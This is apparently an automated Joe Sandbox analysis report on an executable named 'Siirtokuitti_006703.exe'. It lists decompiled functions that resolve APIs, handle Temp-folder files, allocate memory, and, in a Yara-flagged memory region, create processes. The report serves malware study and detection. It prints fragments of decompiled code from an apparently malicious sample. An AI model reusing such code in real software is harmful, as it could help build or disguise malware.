                                                                                                                      • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                                      • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                      • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0040678A(signed int _a4) {
                                                                                                                      				struct HINSTANCE__* _t5;
                                                                                                                      				signed int _t10;
                                                                                                                      
                                                                                                                      				_t10 = _a4 << 3;
                                                                                                                      				_t8 =  *(_t10 + 0x40a410);
                                                                                                                      				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                                                                                      				if(_t5 != 0) {
                                                                                                                      					L2:
                                                                                                                      					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                                                                                      				}
                                                                                                                      				_t5 = E0040671A(_t8); // executed
                                                                                                                      				if(_t5 == 0) {
                                                                                                                      					return 0;
                                                                                                                      				}
                                                                                                                      				goto L2;
                                                                                                                      			}





                                                                                                                      0x00406792
                                                                                                                      0x00406795
                                                                                                                      0x0040679c
                                                                                                                      0x004067a4
                                                                                                                      0x004067b0
                                                                                                                      0x00000000
                                                                                                                      0x004067b7
                                                                                                                      0x004067a7
                                                                                                                      0x004067ae
                                                                                                                      0x00000000
                                                                                                                      0x004067bf
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                                                        • Part of subcall function 0040671A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                                                                        • Part of subcall function 0040671A: wsprintfW.USER32 ref: 0040676C
                                                                                                                        • Part of subcall function 0040671A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406780
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2547128583-0
                                                                                                                      • Opcode ID: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                                                                      • Instruction ID: 6fedc38abd16d04710e8a636fd16f84820eabe090bba127bd882252d3fb3e83b
                                                                                                                      • Opcode Fuzzy Hash: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                                                                      • Instruction Fuzzy Hash: 21E0863250421156D21096745E4893772AC9AC4718307843EF956F3041DB389C35A76D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E00405EA2(WCHAR* _a4, long _a8, long _a12) {
                                                                                                                      				signed int _t5;
                                                                                                                      				void* _t6;
                                                                                                                      
                                                                                                                      				_t5 = GetFileAttributesW(_a4); // executed
                                                                                                                      				asm("sbb ecx, ecx");
                                                                                                                      				_t6 = CreateFileW(_a4, _a8, "true", 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                      				return _t6;
                                                                                                                      			}





                                                                                                                      0x00405ea6
                                                                                                                      0x00405eb3
                                                                                                                      0x00405ec8
                                                                                                                      0x00405ece

                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\Siirtokuitti_006703.exe,80000000,00000003), ref: 00405EA6
                                                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 415043291-0
                                                                                                                      • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                      • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                      • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                      • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00405E7D(WCHAR* _a4) {
                                                                                                                      				signed char _t3;
                                                                                                                      				signed char _t7;
                                                                                                                      
                                                                                                                      				_t3 = GetFileAttributesW(_a4); // executed
                                                                                                                      				_t7 = _t3;
                                                                                                                      				if(_t7 != 0xffffffff) {
                                                                                                                      					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                                                                      				}
                                                                                                                      				return _t7;
                                                                                                                      			}





                                                                                                                      0x00405e82
                                                                                                                      0x00405e88
                                                                                                                      0x00405e8d
                                                                                                                      0x00405e96
                                                                                                                      0x00405e96
                                                                                                                      0x00405e9f

                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405A82,?,?,00000000,00405C58,?,?,?,?), ref: 00405E82
                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E96
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                      • Instruction ID: b4a9c655c7fc096b4b126609cc6ca019b0e5db690544b5b17486f729e9fe50d2
                                                                                                                      • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                      • Instruction Fuzzy Hash: F4D0C972504420ABC2502728EF0889BBB95DB542727124B35FAE9A22B0CB304C568A98
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00405960(WCHAR* _a4) {
                                                                                                                      				int _t2;
                                                                                                                      
                                                                                                                      				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                                                      				if(_t2 == 0) {
                                                                                                                      					return GetLastError();
                                                                                                                      				}
                                                                                                                      				return 0;
                                                                                                                      			}




                                                                                                                      0x00405966
                                                                                                                      0x0040596e
                                                                                                                      0x00000000
                                                                                                                      0x00405974
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75833420,004036D5,?,00000006,00000008,0000000A), ref: 00405966
                                                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405974
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1375471231-0
                                                                                                                      • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                      • Instruction ID: a0b70af09676f49ae35af12b400ff138e6ea5c47fed9fef2c083bef2843b0e9d
                                                                                                                      • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                      • Instruction Fuzzy Hash: 97C04C71255506DADB105F31DE08F1B7A50AB60751F11843AA18AE51B0DA348455DD2D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 21%
                                                                                                                      			E1000289C(void* __ecx, intOrPtr _a4) {
                                                                                                                      				signed int _v8;
                                                                                                                      				void* _t31;
                                                                                                                      				void* _t32;
                                                                                                                      				void* _t36;
                                                                                                                      				void* _t40;
                                                                                                                      				void* _t49;
                                                                                                                      				void* _t54;
                                                                                                                      				void* _t58;
                                                                                                                      				signed int _t65;
                                                                                                                      				void* _t70;
                                                                                                                      				void* _t79;
                                                                                                                      				intOrPtr _t81;
                                                                                                                      				signed int _t88;
                                                                                                                      				intOrPtr _t90;
                                                                                                                      				intOrPtr _t91;
                                                                                                                      				void* _t92;
                                                                                                                      				void* _t94;
                                                                                                                      				void* _t100;
                                                                                                                      				void* _t101;
                                                                                                                      				void* _t102;
                                                                                                                      				void* _t103;
                                                                                                                      				intOrPtr _t106;
                                                                                                                      				intOrPtr _t107;
                                                                                                                      
                                                                                                                      				if( *0x10004050 != 0 && E1000281E(_a4) == 0) {
                                                                                                                      					 *0x10004054 = _t106;
                                                                                                                      					if( *0x1000404c != 0) {
                                                                                                                      						_t106 =  *0x1000404c;
                                                                                                                      					} else {
                                                                                                                      						E10002DE0(E10002818(), __ecx);
                                                                                                                      						 *0x1000404c = _t106;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				_t31 = E1000285A(_a4);
                                                                                                                      				_t107 = _t106 + 4;
                                                                                                                      				if(_t31 <= 0) {
                                                                                                                      					L9:
                                                                                                                      					_t32 = E1000284E();
                                                                                                                      					_t81 = _a4;
                                                                                                                      					_t90 =  *0x10004058;
                                                                                                                      					 *((intOrPtr*)(_t32 + _t81)) = _t90;
                                                                                                                      					 *0x10004058 = _t81;
                                                                                                                      					E10002848();
                                                                                                                      					_t36 = VirtualAlloc(??, ??, ??, ??); // executed
                                                                                                                      					 *0x10004034 = _t36;
                                                                                                                      					 *0x10004038 = _t90;
                                                                                                                      					if( *0x10004050 != 0 && E1000281E( *0x10004058) == 0) {
                                                                                                                      						 *0x1000404c = _t107;
                                                                                                                      						_t107 =  *0x10004054;
                                                                                                                      					}
                                                                                                                      					_t91 =  *0x10004058;
                                                                                                                      					_a4 = _t91;
                                                                                                                      					 *0x10004058 =  *((intOrPtr*)(E1000284E() + _t91));
                                                                                                                      					_t40 = E1000282C(_t91);
                                                                                                                      					_pop(_t92);
                                                                                                                      					if(_t40 != 0) {
                                                                                                                      						_t49 = E1000285A(_t92);
                                                                                                                      						if(_t49 > 0) {
                                                                                                                      							_push(_t49);
                                                                                                                      							_push(E10002865() + _a4 + _v8);
                                                                                                                      							_push(E1000286F());
                                                                                                                      							if( *0x10004050 <= 0 || E1000281E(_a4) != 0) {
                                                                                                                      								_pop(_t101);
                                                                                                                      								_pop(_t54);
                                                                                                                      								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
                                                                                                                      								}
                                                                                                                      								asm("loop 0xfffffff5");
                                                                                                                      							} else {
                                                                                                                      								_pop(_t102);
                                                                                                                      								_pop(_t58);
                                                                                                                      								 *0x1000404c =  *0x1000404c +  *(_t102 + _t58) * 4;
                                                                                                                      								asm("loop 0xffffffeb");
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					if( *0x10004058 == 0) {
                                                                                                                      						 *0x1000404c = 0;
                                                                                                                      					}
                                                                                                                      					_t94 = _a4 + E10002865();
                                                                                                                      					 *(E10002873() + _t94) =  *0x10004034;
                                                                                                                      					 *((intOrPtr*)(E10002877() + _t94)) =  *0x10004038;
                                                                                                                      					E10002887(_a4);
                                                                                                                      					if(E1000283A() != 0) {
                                                                                                                      						 *0x10004068 = GetLastError();
                                                                                                                      					}
                                                                                                                      					return _a4;
                                                                                                                      				}
                                                                                                                      				_push(E10002865() + _a4);
                                                                                                                      				_t65 = E1000286B();
                                                                                                                      				_v8 = _t65;
                                                                                                                      				_t88 = _t31;
                                                                                                                      				_push(_t77 + _t65 * _t88);
                                                                                                                      				_t79 = E10002877();
                                                                                                                      				_t100 = E10002873();
                                                                                                                      				_t103 = E1000286F();
                                                                                                                      				_t70 = _t88;
                                                                                                                      				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
                                                                                                                      					_push( *((intOrPtr*)(_t79 + _t70)));
                                                                                                                      				}
                                                                                                                      				_push( *((intOrPtr*)(_t100 + _t70)));
                                                                                                                      				asm("loop 0xfffffff1");
                                                                                                                      				goto L9;
                                                                                                                      			}


























                                                                                                                      0x100028ac
                                                                                                                      0x100028bd
                                                                                                                      0x100028ca
                                                                                                                      0x100028de
                                                                                                                      0x100028cc
                                                                                                                      0x100028d1
                                                                                                                      0x100028d6
                                                                                                                      0x100028d6
                                                                                                                      0x100028ca
                                                                                                                      0x100028e7
                                                                                                                      0x100028ec
                                                                                                                      0x100028f2
                                                                                                                      0x10002936
                                                                                                                      0x10002936
                                                                                                                      0x1000293b
                                                                                                                      0x10002940
                                                                                                                      0x10002946
                                                                                                                      0x10002948
                                                                                                                      0x1000294e
                                                                                                                      0x1000295b
                                                                                                                      0x1000295d
                                                                                                                      0x10002962
                                                                                                                      0x1000296f
                                                                                                                      0x10002982
                                                                                                                      0x10002988
                                                                                                                      0x1000298e
                                                                                                                      0x1000298f
                                                                                                                      0x10002995
                                                                                                                      0x100029a1
                                                                                                                      0x100029a7
                                                                                                                      0x100029af
                                                                                                                      0x100029b0
                                                                                                                      0x100029b3
                                                                                                                      0x100029be
                                                                                                                      0x100029c0
                                                                                                                      0x100029cc
                                                                                                                      0x100029d2
                                                                                                                      0x100029da
                                                                                                                      0x10002a06
                                                                                                                      0x10002a07
                                                                                                                      0x10002a0d
                                                                                                                      0x10002a0d
                                                                                                                      0x10002a14
                                                                                                                      0x100029ea
                                                                                                                      0x100029ea
                                                                                                                      0x100029eb
                                                                                                                      0x100029f9
                                                                                                                      0x10002a02
                                                                                                                      0x10002a02
                                                                                                                      0x100029da
                                                                                                                      0x100029be
                                                                                                                      0x10002a1d
                                                                                                                      0x10002a1f
                                                                                                                      0x10002a1f
                                                                                                                      0x10002a31
                                                                                                                      0x10002a3e
                                                                                                                      0x10002a4c
                                                                                                                      0x10002a52
                                                                                                                      0x10002a60
                                                                                                                      0x10002a68
                                                                                                                      0x10002a68
                                                                                                                      0x10002a76
                                                                                                                      0x10002a76
                                                                                                                      0x100028fd
                                                                                                                      0x100028fe
                                                                                                                      0x10002903
                                                                                                                      0x10002907
                                                                                                                      0x1000290c
                                                                                                                      0x10002920
                                                                                                                      0x10002921
                                                                                                                      0x10002922
                                                                                                                      0x10002924
                                                                                                                      0x10002929
                                                                                                                      0x1000292b
                                                                                                                      0x1000292b
                                                                                                                      0x1000292e
                                                                                                                      0x10002934
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 1000295B
                                                                                                                      • GetLastError.KERNEL32 ref: 10002A62
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19421717588.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19421678749.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421756473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421792485.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocErrorLastVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 497505419-0
                                                                                                                      • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                                                      • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                                                                                      • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                                                      • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CreateProcessInternalW.KERNELBASE(091C2740,091C2768,091C2500,00000010,091C2768,00000044,?,?,?,00000044,091C2768,00000010,091C2500,091C2768,091C2740,091C27AC), ref: 091D6E51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2186235152-0
                                                                                                                      • Opcode ID: 1c16b4dfa1a23916d5d1f0d88d4d370c1b7da67b1f73619d4663c95dfd1fc265
                                                                                                                      • Instruction ID: 5c541c6d2993d055b1dabc323a752fc63c367dcd35c84c43dd9376a974adee43
                                                                                                                      • Opcode Fuzzy Hash: 1c16b4dfa1a23916d5d1f0d88d4d370c1b7da67b1f73619d4663c95dfd1fc265
                                                                                                                      • Instruction Fuzzy Hash: CC016DB2215208BFCB58DF89DC80EEB77ADAF8C754F558248FA0D97251D630E851CBA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CreateProcessInternalW.KERNELBASE(091C2740,091C2768,091C2500,00000010,091C2768,00000044,?,?,?,00000044,091C2768,00000010,091C2500,091C2768,091C2740,091C27AC), ref: 091D6E51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2186235152-0
                                                                                                                      • Opcode ID: fa052045444a678b4abb6aad36a74142a8f4874219bd3a71acd9792eedd896c7
                                                                                                                      • Instruction ID: c1cb1d6974508ab7ccabd6115f11927500f88d7976f6cc57c44603eaf470fc7f
                                                                                                                      • Opcode Fuzzy Hash: fa052045444a678b4abb6aad36a74142a8f4874219bd3a71acd9792eedd896c7
                                                                                                                      • Instruction Fuzzy Hash: 3201F6B2210148ABCB14DF98DC80EEB77B9AF8C254F15924CFE09A7241C230E851CBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,00000000), ref: 091D6DBD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, Offset: 09150000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_9150000_Siirtokuitti_006703.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: c07c0fe8387f8e083360c56f48a43e8a823bf62b33a41d365ac503720768cefe
                                                                                                                      • Instruction ID: 80ccb81dc8d97a4aa829f1f53a71451fe190146e4bc68bb72a257ce2749294f1
                                                                                                                      • Opcode Fuzzy Hash: c07c0fe8387f8e083360c56f48a43e8a823bf62b33a41d365ac503720768cefe
                                                                                                                      • Instruction Fuzzy Hash: 4DF0F0B1300208ABCB10EF98CC84EA777A8EF85724F508419F98D9B242E730E910CBF1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 70%
                                                                                                                      			E0040167B() {
                                                                                                                      				int _t7;
                                                                                                                      				void* _t13;
                                                                                                                      				void* _t15;
                                                                                                                      				void* _t20;
                                                                                                                      
                                                                                                                      				_t18 = E00402C37(0xffffffd0);
                                                                                                                      				_t16 = E00402C37(0xffffffdf);
                                                                                                                      				E00402C37(0x13);
                                                                                                                      				_t7 = MoveFileW(_t4, _t5); // executed
                                                                                                                      				if(_t7 == 0) {
                                                                                                                      					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E004066F3(_t18) == 0) {
                                                                                                                      						 *((intOrPtr*)(_t20 - 4)) = 1;
                                                                                                                      					} else {
                                                                                                                      						E00406176(_t15, _t18, _t16);
                                                                                                                      						_push(0xffffffe4);
                                                                                                                      						goto L5;
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					_push(0xffffffe3);
                                                                                                                      					L5:
                                                                                                                      					E00401423();
                                                                                                                      				}
                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t20 - 4));
                                                                                                                      				return 0;
                                                                                                                      			}







                                                                                                                      0x00401684
                                                                                                                      0x0040168d
                                                                                                                      0x0040168f
                                                                                                                      0x00401696
                                                                                                                      0x0040169e
                                                                                                                      0x004016aa
                                                                                                                      0x00402885
                                                                                                                      0x004016be
                                                                                                                      0x004016c0
                                                                                                                      0x004016c5
                                                                                                                      0x00000000
                                                                                                                      0x004016c5
                                                                                                                      0x004016a0
                                                                                                                      0x004016a0
                                                                                                                      0x00402245
                                                                                                                      0x00402245
                                                                                                                      0x00402245
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
